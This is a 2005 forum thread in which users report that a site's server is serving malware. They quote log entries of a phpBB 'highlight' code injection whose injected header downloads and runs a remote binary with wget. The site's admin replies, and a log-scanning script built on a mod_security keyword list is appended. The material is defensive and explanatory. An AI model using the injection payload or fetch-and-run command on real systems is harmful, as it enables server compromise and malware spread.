Topic "THIS SITE IS HACKED!!"

Author Message
DogForum

Guest


Does anyone of the admin folks here know that this server has been hacked and is currently delivering the malware for further attacks on thousands of other systems?

Here is an HTTP header I've got a number of days today:

Quote:
========================================
Request: 216.240.142.215 - - [[22/Jul/2005:00:13:53 +0200]] "GET /phpBB2/viewtopic.php?t=924&sid=42ede7bdcaa7224296188f826cc9feeb&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.0" 500 628
Handler: (null)
----------------------------------------
GET /phpBB2/viewtopic.php?t=924&sid=42ede7bdcaa7224296188f826cc9feeb&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.0
Host: [snip for security reasons]
Accept: */*
User-Agent: Mozilla/4.0
PHP: cd /tmp;wget http: / / winscp.net/forum/db/session;chmod +x session;./session;rm -f session


Please shut this server down as quickly as possible and provide for *ALL* the necessary cleanup and software updates necessary to avoid this situation!!

For further info contact me at:
fsaom at spmtst.homeip.net

Kind regards

Manf
Guest




Got attacked by this site also:

Quote:
HTTP/1.1 403 Forbidden
Content-Length: 309
Keep-Alive: timeout=15, max=293
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
========================================
UNIQUE_ID: tvY7Tdh-VEwAAC9oCjQAAAAE
Request: 217.22.54.52 - - [21/Jul/2005:21:20:51 --0500] "GET /forum/viewtopic.php?t=664&sid=641530179edae83d356f3c380476d872&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.0" 403 293
Handler: (null)
----------------------------------------
GET /forum/viewtopic.php?t=664&sid=641530179edae83d356f3c380476d872&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.0
Host: www.MYSITE.com
Accept: */*
User-Agent: Mozilla/4.0
PHP: cd /tmp;wget http://winscp.net/forum/db/session;chmod +x session;./session;rm -f session
mod_security-message: Access denied with code 403. Pattern match "(system|exec|passthru|cmd|fopen|exit|fwrite|wget)" at THE_REQUEST
mod_security-action: 403
martin
Site Admin
Joined: 2002-12-10
Posts: 24530
Location: Prague, Czechia
Issue is hopefully solved. I apologise for any trouble it caused you and my negligence.
_________________
Martin Prikryl
martin
Also please note that the attacks seem to continue from other affected servers. The attacks attempt to use our server to download the files. However, the files are no longer present on our server.

Note that both IP addresses listed above are not of our server!
_________________
Martin Prikryl
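
One way to triage access logs for the request pattern quoted in this thread, as an added example (not code from the posters or from WinSCP): it decodes the `highlight` parameter of `viewtopic.php` requests and reports whether the value looks like code and whether the keyword alternation from the quoted mod_security message matches it. The sample log lines, the IP addresses, the `CODE_SHAPE` heuristic and all function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Keyword alternation copied from the mod_security message quoted in the thread.
RULE = re.compile(r"(system|exec|passthru|cmd|fopen|exit|fwrite|wget)", re.I)
# Assumption: a quote or a call-like token never belongs in a list of search words.
CODE_SHAPE = re.compile(r"['\"`]|\w\s*\(")
# Access-log prefix: client IP, timestamp, request line, status code.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[+[^\]]+\]+ '
    r'"[A-Z]+ (?P<url>\S+)[^"]*" (?P<status>\d{3})')

def scan(lines):
    """Report viewtopic.php requests whose highlight value trips either check."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        url = urlsplit(m["url"])
        if not url.path.endswith("/viewtopic.php"):
            continue
        # parse_qs percent-decodes, so %27 is compared as a literal quote.
        for value in parse_qs(url.query).get("highlight", []):
            code_shape = bool(CODE_SHAPE.search(value))
            rule_match = bool(RULE.search(value))
            if code_shape or rule_match:
                hits.append({"ip": m["ip"], "status": int(m["status"]),
                             "highlight": value, "code_shape": code_shape,
                             "rule_match": rule_match})
    return hits

# Constructed log lines (documentation IP ranges), modelled on the quoted requests.
SAMPLE = """\
192.0.2.10 - - [22/Jul/2005:00:13:53 +0200] "GET /phpBB2/viewtopic.php?t=924&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.0" 500 628
192.0.2.11 - - [22/Jul/2005:00:14:02 +0200] "GET /forum/viewtopic.php?t=664&highlight=%27.system(getenv(HTTP_PHP)).%27 HTTP/1.0" 403 293
198.51.100.7 - - [22/Jul/2005:00:15:40 +0200] "GET /forum/viewtopic.php?t=12&highlight=sftp+exit+code HTTP/1.1" 200 7311
198.51.100.8 - - [22/Jul/2005:00:16:05 +0200] "GET /forum/viewtopic.php?t=12&highlight=winscp HTTP/1.1" 200 7311
""".splitlines()

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

A hit with `code_shape` set and a status below 400 is the one to triage first. The third sample line shows that the keyword list on its own also flags an ordinary search containing the word "exit".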